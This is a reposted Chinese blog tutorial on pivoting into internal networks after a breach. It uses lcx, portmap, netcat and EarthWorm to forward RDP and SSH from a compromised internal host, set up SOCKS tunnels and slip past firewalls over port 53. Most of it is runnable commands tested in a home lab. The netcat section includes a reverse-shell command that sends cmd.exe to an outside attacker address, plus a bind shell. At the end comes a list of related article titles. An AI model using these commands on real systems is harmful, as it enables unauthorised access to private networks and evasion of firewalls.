流量映射端口反弹(lcx,ew)

article/2025/8/24 4:00:53

 转载自西梅哥的有道云: https://note.youdao.com/ynoteshare1/index.html?id=a6bf797cce0b6087cb78b44818dca69f&type=note

内网应用

一、端口转发工具:

1.LCX(支持双系统)

A、window(LCX)

0

上传一些内网主机探测的工具

ms17010(适合08,07)

1.首先安装lcx(正向连接)

在内网主机:转发:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口

在公网地址上:监听:lcx.exe –listen 4444 6666 ##将4444转发出去,转发成6666

验证:远程桌面:mstc 连接公网地址:6666

2.反向连接(lcx --tran)(可以绕过防火墙)

lcx -tran 53 内网地址 3389

自己实验:

正向代理

1.实验环境

首先准备win 08 (内网主机) 192.168.0.101

win 03(web 服务器)192.168.0.103

一台攻击的物理机 192.168.0.102

前提要把lcx这款工具放到内网靶机和web服务器靶机上,放到windows目录下面

0

验证:

0

2.做远程桌面连接的端口转发

a、首先在win 08 上面做端口转发,将3389端口转发到公网上面地址的某个端口

lcx -slave web服务器(公网ip) 公网端口 内网地址 内网端口

lcx -slave 192.168.0.103 6666 127.0.0.1 3389

或者

lcx -slave 192.168.0.103 6666 192.168.0.101 3389

0

b、在web服务器监听到6666端口再转发出去,咱们维劈艾斯服务器或者我们的攻击机器再去用远程桌面连接这个转发出来的端口

lcx –listen 刚才转发过来的端口 转发出去的端口(用户被维劈艾斯或者攻击机的连接端口)

lcx –listen 6666 7777

0

c、验证:注意,连接的时候,是连接的web服务器的地址(他第一台沦陷的服务器)

0

反向代理(偏实战)

这一个就很简单了

a、在web服务器上进行反向连接

lcx -tran web服务器的端口(不被防火墙过滤) 内网地址 内网服务端口

lcx -tran 53 192.168.0.101 3389

53是web服务器上的端口,他访问内网的话,不被防火墙拦截

地址是反向代理的内网主机,3389是内网的远程桌面端口

注意:这个53端口是内部开放的,可以绕过防火墙,如果53不行就可以再换一个1000以内的

0

B、Linux(portmap)

第一种方法:

1.首先将portmap放到kali中

0

然后进行端口转发

2.

services ssh start

第二种方法:

需要ddns内网穿透工具(花生壳)

自己实验

实验环境:

需要将portmap放到kali里面

0

0

./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename] -v: version ##版本号 -h1: host1 ## 一般为被监听的内网地址 -h2: host2 ## 一般是内网的服务端口,列如22,3389等 -p1: port1 ## 一般是你转发给的公网地址 -p2: port2 ## 一般是你转发给的公网端口 -log: log the data ##记录数据到某个日志文件 -m: the action method for this tool ##选择的方法 1: listen on PORT1 and connect to HOST2:PORT2 ##在PORT1上侦听并连接到HOST2:PORT2 相当于lcx -tran 2: listen on PORT1 and PORT2 ##监听,相当于lcx中的 -listen 3: connect to HOST1:PORT1 and HOST2:PORT2 ##转发,相当于lcx -slave  Let me exit...all overd

第一种方法(-m 1):貌似像windows中的反向代理

./portmap -m 1 -p1 转发的公网端口 -h2 内网地址 -p2 内网服务端口

./portmap -m 1 -p1 555 -h2 192.168.0.104 -p2 22

0

验证

0

成功

第二种(-m 2,3)先转发,再进行监听,最后再连接web服务器的端口

正向连接:先转发内网ip和端口,再用web服务器监听,再用外边的进行连接

1.首先需要在web服务器开启监听(kali也可以)

./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777

./portmap -m 2 -p1 6666 -h2 192.168.0.105 -p2 7777

0

2.需要在内网主机上进行转发端口(centos7上面安装portmap)

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.0.105 -p2 6666

或者

./portmap -m 3 -h1 192.168.0.104 -p1 22 -h2 192.168.0.105 -p2 6666

0

0

验证,发现成功

0

二、nc

反向连接

首先进行监听:

nc -lvvp 4444

其次在服务器上开启

nc -t -e cmd.exe 公网ip 4444

正向连接(我们攻击去连接被攻击的)

nc -l -p 4444 -t -e cmd.exe

在kali:

nc -vv ip(靶机地址)4444

-vv相当于参数的复用

-v 参数可以将一些关于连接建立信息输出到标准错误。-v参数多出现几次,则显示的信息会更多一些。如果-v参数没有出现,则NetCat将默默地工作,至到出现错误为止。

三、流量转发

就是本来我们访问不到内网的服务,通过流量转发我们就可以直接访问到了

正向代理

./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理

 攻击机通过访问 目标主机8888 端口使用目标主机提供的代理

反向代理

1.在公网服务器上执行以下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机

2在目标机器执行以下命令

.\ew_for_Win.exe -s rssocks -d 97.xx.xx.23 -e 1024 通过socks隧道连接公网IP的1024端口

1.termite(隧道)EW(内网的穿透)可以顶替lcx

A、端口转发:

0

2.在windows service03种

将ew放入windows中

0

反向连接:

正向连接

B、流量转发:

正向代理:

0

0

-s ssocksd -l 8888

0

反向代理:

1.在kali 中

0

2.win 03

0

小作业:

自己的实验:

准备环境:

一台kali作为公网转发的web服务器 192.168.0.105

一台win server03为内网服务器(沦陷了)

两个里面都需要安装上ew

如下图:

0

将这些工具依次导入 准备的环境中:

0

0

这些参数我们一会再慢慢解释:

VERSION : free1.2

./xxx ([-options] [values])*

options :

Eg: ./xxx -s ssocksd -h

-s state setup the function.You can pick one from the ##

following options:

ssocksd , rcsocks , rssocks ,

lcx_listen , lcx_tran , lcx_slave

-l listenport open a port for the service startup. ##

-d refhost set the reflection host address. ##

-e refport set the reflection port. ##

-f connhost set the connect host address . ##

-g connport set the connect port. ##

-h help show the help text, By adding the -s parameter, ##

you can also see the more detailed help. ##

-a about show the about pages ##

-v version show the version. ##

-t usectime set the milliseconds for timeout. The default ##

value is 1000 ##

正向代理

在kali中直接去连接

./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理

 攻击机通过访问 目标主机8888 端口使用目标主机提供的代理

./ew -s ssocksd -l 8888

0

我们再在我们物理机的浏览器上设置一个代理

一定要看清楚代理类型:SOCKS5

0

0

0

发现成功

反向代理

这次要准备kali作为web服务器,连接外网的

win server 03作为内网

1.在公网服务器(kali)上执行以下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机

./ew -s rcsocks -l 7777 -e 1024 

0

2在目标机器(win 03)执行以下命令

.\ew_for_Win.exe -s rssocks -d 97.xx.xx.23 -e 1024 通过socks隧道连接公网IP的1024端口

ew -s rssocks -d 192.168.0.105 -e 1024

0

3.从浏览器中设置代理进行检测

0

注意端口

验证

0

0

0

发现成功获取到内网主机那个流量了


http://chatgpt.dhexx.cn/article/SjsTTysm.shtml

相关文章

利用lcx作端口映射

端口映射 端口映射就是将内网中的主机的一个端口映射到外网主机的一个端口,提供相应的服务。 当用户访问外网IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。比如,我们在内网中有一台Web服务器,但是外网中的用户…

Lcx端口转发初探

最近写了一个简单的威胁分析专家系统Gui图形界面工具,可以快速判断失陷主机,给出失陷隶属度,非常人性化,压缩包大小有20M。实际上,这个小工具可以帮助一线驻场人员,快速定位高危主机,并给所有主…

隐藏隧道通信:lcx 端口转发

郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 隐藏隧道通信…

lcx端口转发linux_技术干货 | 内网渗透之代理转发

1 前言 谈到内网转发,在我们日常的渗透测试过程中经常会用到端口转发,可以利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。 那为什么不直接通过登陆服务器来对内网中其他机器进行渗透,而是…

lcx用法

lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap Windows版使用方法如下: lcx有两大功能: 1)端口转发(listen和slave成对使用) 2)端口映射(tran) 1、lcx 内网…

lcx端口转发

lcx端口转发: 本文主要通过讲解lcx的本地端口及远程端口转发,让能熟练使用lcx端口转发工具,对端口转发知识有更加深入了解,本次实验靶场来源于暗月(moonsec)师傅,本文内容全由本人通过学习理解编制,文中若有错处&…

LCX端⼝转发

LCX是一款十分经典的内网端口转发工具,基于Socket套接字,具有端口转发和端口映射的功能。但是目前很多杀软已经将其加入了特征库,在实际利用的时候需要自行做免杀处理。 lcx有三个功能: 第一个功能将本地端口转发到本地另一个端口…

网络安全——lcx的使用

lcx程序可以作远程连接,入侵靶机 下面用win7系统和2003系统作对象 1、 Win7系统作攻击机(IP:192.168.184.134) 2003系统作靶机(被攻击的对象)(IP:192.168.184.101) …

lcx使用方法

lcx实现端口转发 概念 比较经典的就是lcx。简单说一下概念,首先内网中的主机一般都是使用的私有ip,在网络出口处经过NAT转换为公网ip后,才能访问internet。 所以,有时当我们进入网站后台cmd,或者捕获了一台内网中的肉…

端口转发之 lcx

lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap Windows版使用方法如下: lcx有两大功能: 1)端口转发(listen和slave成对使用) 2)端口映射(tran) 1、lcx 内网…

远程桌面连接:使用lcx进行端口转发

一、lcx介绍 lcx是一个基于Socket套接字实现的端口转发工具,有Linux和Windows两个版本。比如说,当目标机器开放了3389端口,我们可以将目标机器的3389端口转发到我们自己的外网主机上的某个端口,然后我们在本地机访问外网主机的端…

从服务器下载文件到本地

今天在公司服务器下了一个很大的数据文件(8G),想拉到本地。 环境 本地是Windows,服务器Linux。笔记本刚格式化了,所以碰到了一些之前没有的问题。 过程 1.首先尝试直接winR,输入cmd回车,打开命令行&…

从服务器中下载文件

从服务器中下载文件 本篇博客主要是实现从云服务器中的Linux系统中通过指令下载文件,其具体如下 1、tar -cvzf 压缩包名.tar.gz 文件或文件夹 1.1 指令解释 tar 对多个文件或文件夹进行打包/解包,并且可以进行压缩/解压缩-c 打包; -x 解…

linux上传下载文件

上传下载文件 背景: 通常,我们需要上传本地文件到服务器,或者从服务器下载文件到本地。 一般来说,方法多种多样。我们可以通过SCRT提供的一个辅助工具来进行 下载辅助工具 yum -y install lrzsz命令行 sz # 从服务器下载某文件到…

文件 - 04 下载文件: 根据文件下载链接下载文件

文章目录 1. 根据下载链接下载文件2. 根据下载链接下载文件1. 根据token获取存放在redis中的fileId2. 根据fileId获得文件信息3. 确定用户拥有操作这个fileId的权限4. 获取文件在服务器的存储路径5. 如果用户指定了下载时的文件名则处理文件名6. 验证文件路径是否存在7. 下载文…

文件上传、下载

在Web应用系统开发中,文件上传和下载功能是非常常用的功能,今天来讲一下JavaWeb中的文件上传和下载功能的实现。 对于文件上传,浏览器在上传的过程中是将文件以流的形式提交到服务器端的,如果直接使用Servlet获取上传文件的输入流…

文件下载相关

下载文件的时候,返回报文里缺失响应码,原因:报文头在报文体前面,报文体一旦确定,响应头信息就不能被修改或添加了,但是如果文件流字节数小于等于8192*2的话,文件流内容会被默认加载在缓存中&…

Linux 如何从网上下载文件

镜像下载、域名解析、时间同步请点击 阿里云开源镜像站 将网络上的文件下载到使用 Linux 操作系统的计算机上,需要用到 wget 指令,使用该指令可能会面临两个问题。 首先,如何获取文件的下载 url?这需要你在浏览器上找到要下载文…

github怎么下载文件

在浏览器上打开github主站,点击搜索框。输入关键字搜索自己需要的代码文件,搜索到后点击打开文件库的主分支。 点击右边的code按钮。点击下拉菜单的下载按钮就可以下载文件了。

前端下载文件的几种方式

一、a标签download下载 后端返回一个可下载的url文件,或者前端本地保存的文件,通过路径引入下载。 (1)将资源放入前端本地保存,打包后随一起上传自服务器 // 本地资源下载,引入路径即可,这里的路径指的是…